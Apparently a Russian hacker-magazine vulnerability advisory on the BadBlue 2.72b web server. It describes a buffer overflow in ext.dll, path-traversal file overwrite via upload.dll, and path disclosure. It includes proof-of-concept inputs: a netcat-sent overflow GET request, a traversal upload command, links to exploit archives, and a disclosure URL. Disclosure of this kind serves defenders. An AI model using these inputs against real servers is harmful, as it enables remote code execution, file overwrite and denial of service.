Хакер #305. Многошаговые SQL-инъекции
Программа: BadBlue 2.72b
Найденные уязвимости позволяют удаленному злоумышленнику перезаписать
произвольные файлы, получить доступ к конфиденциальной информации, осуществить
DoS атаку и выполнить произвольный код на целевой системе.
1) Уязвимость возникает из-за ошибки в проверке входных данных в URI при
вызове команды PassThru из ext.dll и копировании их в буфер 4096 байт. Атакующий
может передать специально составленный URI, что приведет к переполнению буфера.
Пример:
http://aluigi.org/poc/badbluebof.txt
nc SERVER 80 -v -v < badbluebof.txt
> badbluebof.txt
GET /ext.dll?mfcisapicommand=PassThru&aaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaa . . . aaa
HTTP/1.0
2) Уязвимость возникает из-за ошибки в проверке входных данных при загрузке
файлов на сервер. Атакующий может перезаписать произвольные файлы на целевой
системе, включая ext.ini, содержащий конфигурацию сервера.
Пример:
http://aluigi.org/testz/myhttpup.zip
http://milw0rm.com/sploits/2007-myhttpup.zip
myhttpup http://SERVER/upload.dll file.txt ../../file.txt filedata0
3) Уязвимость возникает из-за ошибки в проверке входных данных при
использовании параметра "?&browse=". Атакующий может использовать параметр "?&browse="
на несуществующей директории, что позволит получить полный путь к Web серверу.
Пример:
http://SERVER/blah/?&browse=